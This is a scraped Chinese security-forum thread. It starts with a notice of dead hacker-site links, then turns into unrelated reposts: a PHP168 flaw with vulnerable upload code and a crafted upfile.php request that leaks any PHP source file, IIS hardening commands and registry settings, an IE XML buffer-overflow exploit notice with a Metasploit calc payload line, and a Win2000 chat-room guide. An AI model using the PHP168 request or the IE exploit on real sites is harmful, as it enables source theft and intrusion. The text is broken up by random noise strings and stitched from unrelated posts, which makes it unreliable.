最近看过此主题的会员

返回列表 发帖

清理部分无效链接,如有误请及时联系管理组(2012,4,28更新)

清理无效链接如下; i9 d# s5 P6 S. d6 h4 m" S

, o! c6 W' ^6 S黑客技术9 P3 L/ I$ A' m7 @. T2 _+ K
www.h4ckx.org4 G8 a  ~  M9 c0 ^: c
软件江湖, g8 v3 l' J, y; c
www.5oxo.com2 {7 Z" b, y! D, V4 \5 o, T
菜菜部落格
/ m) `% M5 D; V. ~  Xwww.ccblog.org( B; `1 y4 k) H/ w) C
瑞佐博客1 }* b' n0 m  M/ E9 I7 S0 p/ G
www.hackerrz.com8 o+ |* _" l1 B2 `# v( G8 d8 }
黑客市场! p8 g  s% M' G0 ]7 `% F3 z
www.heikeshichang.com
# L( m' `$ F% a3 ^3 h6 n& \( ?1 B$ p$ d4 K9 N* Y

; ^! ~. X+ O# u                                      2011、6、27

" y, \) M2 r6 P% P& U7 k

3 ^% r% b% Z6 j7 S. C

Daniel's Blog

http://www.52mxd.org

该域名已过期。

* m8 j0 B2 o( Q- e3 }, u$ r% \) ~

2012、4、28

 

您可能还想看的主题:

Quick Heal Firewall Pro3.0

Android系统再现木马,变身驱动程式袭击用户

研究人员发现新型“无文件”恶意软件

U盘之家启动制作工具 /一键制作启动U盘/ 1.2 简体免费版

常用运行库 2011.9.09 纯净安装版

Virtual PC 2007 SP1(微软虚拟机)v6.0.192.0 汉化安装版

ESET ID自动获取器 1.2.0.9 官方绿色版

迅雷精简版(迅雷7官方精简版)下载v1.3.124绿色版

QQ农牧餐保姆v4.0.6 绿色去广告版

蛋疼,菊紧得我,折腾一晚上.

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:無情发表,本帖发表者無情符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者無情和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

哈哈
1

评分人数

    • 無情: 沙发有奖,恭喜金钱 + 1 金

TOP

瑞佐的也掉了? = =
http://chenming5869.blog.163.com/
百分百付出的汗水,百分百走向成功

TOP

回复 3# chenming123 + c4 k; z3 U% ~* d. r$ g) k4 z) A

' B" W* L4 O0 G7 L# X5 T# N% R& m8 u, V0 s
    不是掉了,,
+ v4 Y* O+ c+ [% Z
  ?! X; k) c& }% i6 ~ 他的都换了,ntsafe

TOP

支持··

TOP

php168整站最新漏洞
漏洞发现者:xhming

5 _) g5 d- H6 d6 m& g0 C
                        漏洞文件是根目录的upfile.php这次不是上传漏洞,而是泄露源代码!!
/ Z+ S0 M) `  I4 R; D0 x
<?phpif($postfile){               if( !ereg("^[0-9a-z_/]+$",$dir)||ereg("^/",$dir) ){                $dir="other";        }        $array[name]=is_array($postfile)?$_FILES[postfile][name]:$postfile_name;        $array[path]=$webdb[updir]."/".$dir;        $array[size]=is_array($postfile)?$_FILES[postfile][size]:$postfile_size;        $array[updateTable]=1;
' `* @5 c8 K2 ~8 R5 Q0 R) Z) p
$filename=upfile(is_array($postfile)?$_FILES[postfile][tmp_name]:$postfile,$array);
4 Z) R. C: O, Q, X4 r2 a/ g
         看到没有只要$postfile存在,并且不为数组我们就可以为$postfile,$postfile_name,$postfile_size付值
- ?- G' T  ?* @0 T3 r
本地直接构造提交页面提交地址为http://www.xxx.com/upfile.php?postfile=biz/product.php&amp;postfile_name=shop/images/default/logo.gif&amp;postfile_size=333 //$postfile可以为任意php文件,提交成功有地址返回!,经测试官方也有此漏洞!

* L' |8 O: |5 f7 n
$ J0 T, S- \6 X! d) B4 X$ ~3 F# Z9 O
* \/ b- d+ j" f8 N$ y; i
: a8 g, B6 C1 m4 g8 I
! X; C' H3 i! w+ [0 ?0 c
# ]5 H3 ]7 u: N* m: z8 L3 D& B

7 L7 _5 j" \, u7 r4 |+ P9 i- m  I) Q' e; p- I. U# ?0 @& Z4 \
# v6 M+ b, c5 H; d/ Q
' Q6 k% s$ m! t/ g9 U

" F% B; T3 ^1 J  f4 n( ?. C6 }9 ?: P

' x& |/ D/ o( l) V# `7 Q9 e  U# i7 _
. b' }! k+ [8 a" C
! z4 K, {. R7 T+ m

. [+ ?4 V1 R# [$ o* o! h% I7 x  Q7 X0 I) Q9 p( i9 o6 u1 Q! H
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

IIS常见问题
IIS常见问题自己留着也许有用。1.如何让asp脚本以system权限运行?修改你asp脚本所对应的虚拟目录,把"应用程序保护"修改为"低"....2.如何防止asp木马?基于FileSystemObject组件的asp木马cacls %systemroot%system32scrrun.dll /e /d guests //禁止guests使用regsvr32 scrrun.dll /u /s //删除基于shell.application组件的asp木马cacls %systemroot%system32shell32.dll /e /d guests //禁止guests使用regsvr32 shell32.dll /u /s //删除3.如何加密asp文件?从微软免费下载到sce10chs.exe 直接运行即可完成安装过程。安装完毕后,将生成screnc.exe文件,这是一个运行在DOS PROMAPT的命令工具。运行screnc - l vbscript source.asp destination.asp生成包含密文ASP脚本的新文件destination.asp用记事本打开看凡是""之内的,不管是否注解,都变成不可阅读的密文了但无法加密中文。4.如何从IISLockdown中提取urlscan?iislockd.exe /q /c /t:c:urlscan5.如何防止Content-Location标头暴露了web服务器的内部IP地址?执行cscript c:inetpubadminscriptsadsutil.vbs set w3svc/UseHostName True最后需要重新启动iis6.如何解决HTTP500内部错误?iis http500内部错误大部分原因主要是由于iwam账号的密码不同步造成的。我们只要同步iwam_myserver账号在com+应用程序中的密码即可解决问题。执行cscript c:inetpubadminscriptssynciwam.vbs -v7.如何增强iis防御SYN Flood的能力?Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpipParameters]'启动syn攻击保护。缺省项值为0,表示不开启攻击保护,项值为1和2表示启动syn攻击保护,设成2之后'安全级别更高,对何种状况下认为是攻击,则需要根据下面的TcpMaxHalfOpen和TcpMaxHalfOpenRetried值'设定的条件来触发启动了。这里需要注意的是,NT4.0必须设为1,设为2后在某种特殊数据包下会导致系统重启。"SynAttackProtect"=dword:00000002'同时允许打开的半连接数量。所谓半连接,表示未完整建立的TCP会话,用netstat命令可以看到呈SYN_RCVD状态'的就是。这里使用微软建议值,服务器设为100,高级服务器设为500。建议可以设稍微小一点。"TcpMaxHalfOpen"=dword:00000064'判断是否存在攻击的触发点。这里使用微软建议值,服务器为80,高级服务器为400。"TcpMaxHalfOpenRetried"=dword:00000050'设置等待SYN-ACK时间。缺省项值为3,缺省这一过程消耗时间45秒。项值为2,消耗时间为21秒。'项值为1,消耗时间为9秒。最低可以设为0,表示不等待,消耗时间为3秒。这个值可以根据遭受攻击规模修改。'微软站点安全推荐为2。"TcpMaxConnectResponseRetransmissions"=dword:00000001'设置TCP重传单个数据段的次数。缺省项值为5,缺省这一过程消耗时间240秒。微软站点安全推荐为3。"TcpMaxDataRetransmissions"=dword:00000003'设置syn攻击保护的临界点。当可用的backlog变为0时,此参数用于控制syn攻击保护的开启,微软站点安全推荐为5。"TCPMaxPortsExhausted"=dword:00000005'禁止IP源路由。缺省项值为1,表示不转发源路由包,项值设为0,表示全部转发,设置为2,表示丢弃所有接受的'源路由包,微软站点安全推荐为2。"DisableIPSourceRouting"=dword:0000002'限制处于TIME_WAIT状态的最长时间。缺省为240秒,最低为30秒,最高为300秒。建议设为30秒。"TcpTimedWaitDelay"=dword:0000001e8.如何避免*mdb文件被下载?安装ms发布的urlscan工具,可以从根本上解决这个问题。同时它也是一个强大的安全工具,你可以从ms的网站上获取更为详细的信息。9.如何让iis的最小ntfs权限运行?依次做下面的工作:a.选取整个硬盘:system:完全控制administrator:完全控制(允许将来自父系的可继承性权限传播给对象)b.program filescommon files:everyone:读取及运行列出文件目录读取(允许将来自父系的可继承性权限传播给对象)c.inetpubwwwroot:iusr_machine:读取及运行列出文件目录读取(允许将来自父系的可继承性权限传播给对象)e.winntsystem32:选择除inetsrv和centsrv以外的所有目录,去除“允许将来自父系的可继承性权限传播给对象”选框,复制。f.winnt:选择除了downloaded program files、help、iis temporary compressed files、offline web pages、system32、tasks、temp、web以外的所有目录去除“允许将来自父系的可继承性权限传播给对象”选框,复制。g.winnt:everyone:读取及运行列出文件目录读取(允许将来自父系的可继承性权限传播给对象)h.winnt        emp:(允许访问数据库并显示在asp页面上)everyone:修改(允许将来自父系的可继承性权限传播给对象)10.如何隐藏iis版本?一个黑客可以可以轻易的telnet到你的web端口,发送get命令来获取很多信息iis存放IIS BANNER的所对应的dll文件如下:WEB:C:WINNTSYSTEM32INETSRVW3SVC.DLLFTP:C:WINNTSYSTEM32INETSRVFTPSVC2.DLLSMTP:C:WINNTSYSTEM32INETSRVSMTPSVC.DLL你可以用16进制编辑器去修改那些dll文件的关键字,比如iis的Microsoft-IIS/5.0具体过程如下:1.停掉iis iisreset /stop2.删除%SYSTEMROOT%system32dllcache目录下的同名文件3.修改 % N: ^& P1 j2 p3 v4 p

$ T) R( q; j8 j. H
+ A% k* F8 O/ t( p2 Q+ n3 c" m$ r8 L, o) N1 [: _- L

) _$ @- a9 s) p3 Q' U/ o1 U% z+ M: v3 X

) x( Z7 x' u2 M2 M3 N" a& c" O! D& u
/ A* a$ k  ]4 S5 D  `. `
( k+ f9 ^: r9 f  n, M
5 V/ q! s, U& ]# I( q

! W" g% f% m0 Y% Y- A, K+ d) f& ~1 d2 ]# p
+ M' a- H! B  X6 c, m" @
! e0 m+ x+ `7 _! u3 \  J

3 F: ]0 u( p+ v5 f$ _9 E/ [( y* d& }: A
' G: @( [+ K8 t  @

9 V5 w# n8 g# }; l2 i7 s8 `. j公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

IE XML解析远程缓冲溢出漏洞
漏洞相关源码请下载附件包:2008-iesploit.rar
, b+ k& g* l! ~$ [/ `
IE XML解析远程缓冲溢出漏洞

& ^7 j2 Q. M' q. ~% R
包内含2个文件:ie-sploit.html为利用文件iframe.html为XML文件

* n5 n% w# m8 g0 _" v' U7 c
0 D, k% M2 S5 u9 f[quote]
//windows/exec                                                                                                                                // EXITFUNC=seh, CMD=C:WINDOWSsystem32calc.exe     * l$ B2 K1 s% I6 f
[quote][/quote]0 u  S8 b/ l5 C- ]9 S
2 X8 M* p9 s( y9 P

0 P" g4 D6 b$ M; a% q! \$ Y: N1 n' s; I$ I3 \# K* p' M

* ?& X" J$ F& @4 U2 ~
9 v. R/ w2 W; T3 |# X0 n
5 p# l( @0 ?- {* G5 ?9 N; S+ V- Y
- {8 O- Y2 B4 _1 D2 x, ?0 ^8 O9 A, F1 P  S4 @  ]

. @6 }: n% L7 ?5 l6 N4 K# k9 O$ ^) z2 g2 q4 Z) P

' ?& ]: ]6 y/ r, `
: s3 A+ l1 q  ^- S# F4 W- K" x  R8 _* V/ S, Y; b9 C6 q- h

/ y$ h) y0 M# {4 p' T- R+ k7 F' @! ?1 f) c

8 k9 O9 S8 I1 F' Z8 Z
+ d; t! ^! h% x7 O5 u6 |( u
, }  ], ]' }* f) J公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Win2000服务器设置全攻略(九)
前言 注意:1/2)本文限在局域网中;2/2)本文未特定指出处,均使用其默认选项。 八、聊天室 (一)关于本聊天室程序 1、本聊天室使用ASP编程实现 2、本聊天室程序是我以前一个同事copy给我的,为忠于原著,我未作任何修改 3、我99%不懂ASP,因此除了不能用之外,其他的修改,请不要问我 (二)使用说明 1、下载 1/2)压缩文件包括17个源文件及本说明文件(readme.htm),共约68.7K 2/2)地址:http://nanshan.363.net/down/chat.zip 2、安装 1/2)先在C:Inetpubwwwroot(所设WWW的根目录)下建立一个名为chat的文件夹,再将得到的chat.zip文件解压到里面。文件列表如下图:  2/2)调用网址为:http://www.lianhe.com/chat 3、使用 1/3)进入http://www.lianhe.com/chat后,即为聊天室的登录界面。如下图:  2/3)输入nikename(如“三台”),再选“确定”(或敲回车键)即进入聊天室的聊天界面。如下图:  3/3)据实验得知,“操作指南”一项不能使用 7 |( `# \% p" R2 T
' ?, W4 K, u  `! D

$ \3 I$ ]. G7 `! P
  ]! k) u3 y" x  r, `+ L- O. w6 g; k- j; f7 Z& _& }% U  O! j+ t. g

4 ?7 J2 M1 r" N' R! x
" f3 y$ k: e' L1 l0 @- [+ W, u* a" y4 m: w

$ N( T3 l" y" q
( Y' a5 B- C! m' M* q+ P8 A1 a* O& o. R& K6 L5 Y
1 H: @8 v1 {# y* c4 A3 d% b' r8 v

9 C. S2 u9 o8 y1 k, d  b  k5 P. S1 D4 m2 O+ D

7 Z! a+ B4 Q7 G' ?
: C1 z: b( p5 N6 P" s* o% `5 h9 p0 Q  }; \' v; c; f
  e" i0 t' E, c5 R
8 D$ |' D/ u# I1 S6 M4 |4 v  `
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表